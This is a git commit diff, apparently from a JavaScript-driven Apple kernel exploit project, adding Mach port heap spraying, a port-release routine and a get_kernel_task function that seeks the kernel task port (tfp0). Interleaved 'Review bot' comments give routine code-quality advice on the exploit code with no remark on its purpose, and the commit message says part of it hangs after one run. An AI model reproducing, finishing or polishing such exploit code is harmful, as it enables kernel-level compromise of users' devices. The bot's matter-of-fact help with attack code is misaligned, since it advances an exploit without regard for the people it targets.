authorspv <aquaticvegetable@gmail.com>2022-04-27 12:00:16 -0400
committerspv <aquaticvegetable@gmail.com>2022-04-27 12:00:16 -0400
commit41a1e7292997c84643202f3d27a4daa4b02197e4 (patch)
tree4d2828935d4b5e9100903a698ea6136d1b277649 /src
parent33be9e9d0a5ee0abd0837b74cca15474b81c4f57 (diff)
add hopefully functional port spray and broken release_port_ptrs that hangs after 1 run
Diffstat (limited to 'src')
-rwxr-xr-xsrc/js/kexp/exploit.js60
-rwxr-xr-xsrc/js/lib/myutils.js4
-rw-r--r--src/js/primitives/mem.js2
3 files changed, 53 insertions, 13 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e0ef574..22f68ca 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc;
var req_head_msgh_id = 0x14;
var req_msgh_body_msgh_descriptor_count = 0x18;
var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
-var req_init_port_set_address = 0x0
-var req_init_port_set_count = 0x4
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
var task_self = 0;
var kslide = 0;
@@ -181,7 +183,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
+// printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
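Review bot: Commenting out the `printf("spray_ports %d\n", …)` trace leaves dead code in spray_ports; delete the line rather than keeping it as a comment. The same applies to the commented-out printf added in send_ports, which could not be re-enabled as written anyway because `new_buf_[zz]]` has an unbalanced bracket and `zz` is not defined anywhere in that hunk, and to the commented-out `if (ret != KERN_SUCCESS)` guard in release_port_ptrs. If traces are still wanted while debugging, keeping them behind a single debug flag avoids this comment/uncomment churn. spray_ports continues in the next hunk.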
@@ -191,11 +193,12 @@ function spray_ports(number_port_descs) {
var mp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- var rmp = read_u32(mp);
- mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(rmp, read_u32(kp), 2, number_port_descs);
- return mp;
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret = read_u32(mp);
+ free(mp);
+ return ret;
}
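Review bot: The new spray_ports body evaluates `read_u32(mp)` four times where the removed lines read it once into `rmp`, so the port name is re-fetched from memory on every use and the code reads worse than before the change. Keep the local, `var rmp = read_u32(mp);` right after the allocate call, pass `rmp` to mach_port_insert_right and send_ports, and finish with `free(mp); return rmp;`, which also makes the `ret` temporary unnecessary. spray_ports begins in the previous hunk.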
function fast_log2(n) {
@@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) {
new_buf_.push(tmp[3]);
new_buf_.push(0);
new_buf_.push(0);
- new_buf_.push(19);
new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ new_buf_.push(19);
+
+// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
var new_buf = fast_array_mul(new_buf_, number_port_descs);
@@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) {
free(buf);
- printf("%d %s\n", ret, mach_error_string(ret));
-
return ret;
}
+function release_port_ptrs(port) {
+ printf("alive\n");
+ var req = malloc(0x1c + (5 * 0xc) + 0x8);
+ for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
+ write_u32(req + i, 0x0);
+ }
+ printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ printf("alive\n");
+ var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("alive\n");
+ // if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ printf("alive\n");
+ // }
+ free(req);
+ printf("alive\n");
+}
+
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
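Review bot: The receive-buffer size `0x1c + (5 * 0xc) + 0x8` is spelled out three times in release_port_ptrs (malloc, the zeroing loop bound, hexdump/read_buf, and the mach_msg size argument); bind it once, `var req_size = 0x1c + (5 * 0xc) + 0x8;`, and use it everywhere so the four cannot drift apart. The five `printf("alive\n")` lines are indistinguishable from each other in the output; if they stay while the hang is investigated, number them or replace them with one trace that prints `ret`, otherwise drop them. The function also lacks a header comment; a one-liner such as `// Receive one message on port into a zeroed buffer and report the mach_msg status.` would state what the code visibly does without guessing at more. release_port_ptrs is complete within this hunk, but get_kernel_task continues past it.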
@@ -318,17 +339,36 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+ sched_yield();
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
+ sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
+ sched_yield();
+ for (var i = 0; i < PORTS_NUM; i++) {
+ printf("test\n");
+ printf("test1\n");
+ printf("test2\n");
+ printf("test3\n");
+ printf("test4\n");
+ printf("test5\n");
+ printf("test6\n");
+ printf("test7\n");
+ printf("test8\n");
+ printf("test9\n");
+ printf("test10\n");
+ release_port_ptrs(read_u32(fp + (i << 2)));
+ printf("test11\n");
+ }
+
printf("get lucky\n");
return tfp0;
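Review bot: The eleven `printf("test…\n")` lines inside the new release loop are leftover debugging output with no diagnostic content; collapse them to a single `printf("release %d\n", i);` before the release_port_ptrs call, or remove them before this lands. The three bare `sched_yield();` calls inserted between the spray phases also deserve a short why-comment, since nothing in the hunk says what the yield is meant to achieve and a reader cannot tell whether it is load-bearing or a leftover experiment. get_kernel_task starts and ends outside this hunk.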
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 325c490..e856624 100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -95,8 +95,8 @@ var strlen = scall_wrapper("strlen");
var mach_task_self = scall_wrapper("mach_task_self");
var mach_thread_self = scall_wrapper("mach_thread_self");
var malloc = scall_wrapper("malloc");
-var mach_port_allocate = scall_wrapper("malloc");
-var mach_port_insert_right = scall_wrapper("malloc");
+var mach_port_allocate = scall_wrapper("mach_port_allocate");
+var mach_port_insert_right = scall_wrapper("mach_port_insert_right");
var mach_port_set_attributes = scall_wrapper("mach_port_set_attributes");
var usleep = scall_wrapper("usleep");
var sched_yield = scall_wrapper("sched_yield");
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index ff12fdd..f6c4fe7 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -92,7 +92,7 @@ function write_u32_buf(addy, buf, len) {
}
function fast_write_buf(addy, buf) {
- var upper_i = Math.floor(buf.length / 0x100);
+ var upper_i = Math.ceil(buf.length / 0x100);
for (var i = 0; i < upper_i; i++) {
u8x4 = u32_to_u8x4(addy + (i * 0x100));